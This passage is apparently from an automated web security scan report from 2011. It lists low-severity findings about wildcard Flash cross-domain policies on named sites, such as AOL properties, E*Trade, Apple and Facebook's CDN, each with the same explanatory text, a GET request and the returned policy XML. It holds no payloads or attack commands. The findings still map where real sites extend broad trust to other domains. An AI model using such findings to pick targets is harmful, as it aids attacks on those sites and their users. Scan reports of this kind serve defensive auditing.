<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.100. http://realestate.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://realestate.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: realestate.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:43 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_COOKIE=aid=d2da7cac76b211e0a35be5945a0c55da; path=/; domain=.aol.com; expires=Fri May 04 00:58:43 2012 GMT
Content-Type: application/xml
Content-Length: 427
Set-Cookie: userNum=58; Expires=Sat, 04-Jun-2011 00:58:43 GMT
Keep-Alive: timeout=5, max=61
Connection: Keep-Alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aolcdn.com"/>

...[SNIP]...
<allow-access-from domain="*.yourminis.com"/>
...[SNIP]...

6.101. http://redir.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://redir.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: redir.adsonar.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:53 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=732
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.102. https://secure.opinionlab.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.opinionlab.com

Response

HTTP/1.1 200 OK
Age: 2
Date: Thu, 05 May 2011 10:54:04 GMT
Connection: Keep-Alive
Via: YouBeenCached
ETag: "d09b92e3ff85c81:2bfc"
Content-Length: 97
Content-Type: text/xml
Last-Modified: Fri, 14 Mar 2008 18:19:06 GMT
Accept-Ranges: bytes
Cool01: Opinionlab - Cool01

...<cross-domain-policy>
   <allow-access-from domain="*.opinionlab.com"/>
</cross-domain-policy>

6.103. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Thu, 05 May 2011 00:57:35 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.104. http://television.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://television.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: television.aol.com

Response

HTTP/1.0 200 OK
set-cookie: dcisid=2899132428.408601165.2049507328; path=/
MIME-Version: 1.0
Date: Thu, 05 May 2011 10:54:49 GMT
Server: AOLserver/4.0.10
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 1511
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="iamalpha.com" />
<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="*.moviefone.com" />
<allow-access-from domain="*.aolhealth.com" />
<allow-access-from domain="*.walletpop.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.lightningcast.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="*.fanhouse.com" />
<allow-access-from domain="*platformaprojects.com" />
...[SNIP]...

6.105. https://us.etrade.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://us.etrade.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.etrade.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:03 GMT
Server: Apache
Last-Modified: Tue, 19 Oct 2010 16:10:27 GMT
ETag: "119-4cbdc2f3"
Accept-Ranges: bytes
Content-Length: 281
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.etrade.com" />
<allow-access-from domain="a248.e.akamai.net" />
<allow-access-from domain="*.etradegrp.com" />
...[SNIP]...

6.106. http://video.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:02 GMT
Server: Apache-Coyote/1.1
ETag: W/"775-1276006811000"
Last-Modified: Tue, 08 Jun 2010 14:20:11 GMT
Content-Type: application/xml;charset=utf-8
Content-Length: 775
Set-Cookie: familyfilter=1; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="cdn-startpage.aol.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="startpage.aol.com"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.aol.in"/>
<allow-access-from domain="*.aol.ca"/>
<allow-access-from domain="*.aol.tw"/>
<allow-access-from domain="*.aol.de"/>
<allow-access-from domain="*.aol.fr"/>
<allow-access-from domain="*.aol.co.uk"/>
<allow-access-from domain="*.aol.jp"/>
<allow-access-from domain="*.estage.aol.com"/>
<allow-access-from domain="*.video.aol.com"/>
<allow-access-from domain="*.channels.aol.com"/>
<allow-access-from domain="*.web.aol.com"/>
<allow-access-from domain="*.my.aol.com"/>
...[SNIP]...

6.107. http://video.foxbusiness.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.foxbusiness.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.foxbusiness.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 03 May 2011 20:43:27 GMT
Accept-Ranges: bytes
Content-Length: 944
Content-Type: application/xml
Server: Apache
ETag: "3dc006-3b0-3128d9c0"
Cache-Control: max-age=300
Date: Thu, 05 May 2011 10:56:05 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.foxbusiness.com" />
<allow-access-from domain="*.foxnews.com" />
<allow-access-from domain="*.foxsmallbusinesscenter.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.grabqa.com" />
<allow-access-from domain="*.grabtest.com" />
<allow-access-from domain="*.panachetech.com" />
<allow-access-from domain="*.projects.mediadev.edgesuite.net" />
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.dartmotif.com"/>
<allow-access-from domain="*.mediapm.edgesuite.net"/>
...[SNIP]...

6.108. http://video.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://video.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: video.google.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 19:35:47 GMT
Expires: Thu, 03 May 2012 19:35:47 GMT
X-Content-Type-Options: nosniff
Content-Type: text/x-cross-domain-policy
Last-Modified: Sat, 09 Apr 2011 00:14:17 GMT
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 55223

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s.ytimg.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

6.109. http://weather.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://weather.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: weather.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:17 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1214
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="cdn-startpage.aol.com"/>
<allow-access-from domain="startpage.aol.com"/>
<allow-access-from domain="*.channels.aol.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.web.aol.com"/>
<allow-access-from domain="*.my.aol.com"/>
<allow-access-from domain="*.news.aol.com"/>
<allow-access-from domain="iamalpha.com"/>
<allow-access-from domain="imakealpha.com"/>
<allow-access-from domain="aimcreate.mdat.aim.com:30100 "/>
<allow-access-from domain="*.spinner.com"/>
<allow-access-from domain="*.popeater.com"/>
<allow-access-from domain="*.theboombox.com"/>
<allow-access-from domain="*.yourminis.com"/>
<allow-access-from domain="*.opticalcortex.com"/>
<allow-access-from domain="static.stats.com"/>
<allow-access-from domain="*.stats.com"/>
...[SNIP]...

6.110. http://www.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

6.111. http://www.aolnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:19 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 2128
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.digitalcity.com" />
<allow-access-from domain="*.digitas.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="*.news.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.opticalcortex.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.popeater.com" />
<allow-access-from domain="*.publishing.aol.com" />

<allow-access-from domain="*.rewind.com" />
<allow-access-from domain="*.spinner.com" />
<allow-access-from domain="*.stats.com" />
<allow-access-from domain="*.theboombox.com" />
<allow-access-from domain="*.tmz.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.video.aol.com" />
<allow-access-from domain="*.video.office.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" />

<allow-access-from domain="imakealpha.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="publishing.aol.com" />
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="static.stats.com" />
<allow-access-from domain="tmz.warnerbros.com" />
...[SNIP]...

6.112. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.3 (Oracle)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=28
Expires: Thu, 05 May 2011 12:45:46 GMT
Date: Thu, 05 May 2011 12:45:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

6.113. http://www.blogsmithmedia.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogsmithmedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Dec 2010 02:59:47 GMT
Content-Type: application/xml
Cache-Control: max-age=3600
Expires: Thu, 05 May 2011 01:58:26 GMT
Date: Thu, 05 May 2011 00:58:26 GMT
Content-Length: 782
Connection: close
X-N: S

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.blogsmith.net" to-ports="*" />
   <allow-access-from domain="*.blogsmith.com" to-ports="*" />
   <allow-access-from domain="*.aolcdn.com" to-ports="*" />
   <allow-access-from domain="*.aol.com" to-ports="*" />
   <allow-access-from domain="*.*.aol.com" to-ports="*" />
   <allow-access-from domain="*.yourminis.com" to-ports="*" />
...[SNIP]...

6.114. http://www.citysbest.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:38 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999877
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.115. http://www.dailyfinance.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:36 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length: 204
Keep-Alive: timeout=5, max=999968
Connection: Keep-Alive
Content-Type: text/xml; charset=utf-8

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.test.aol.com"/>
</cross-domain-pol
...[SNIP]...

6.116. http://www.dooce.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dooce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dooce.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:56:30 GMT
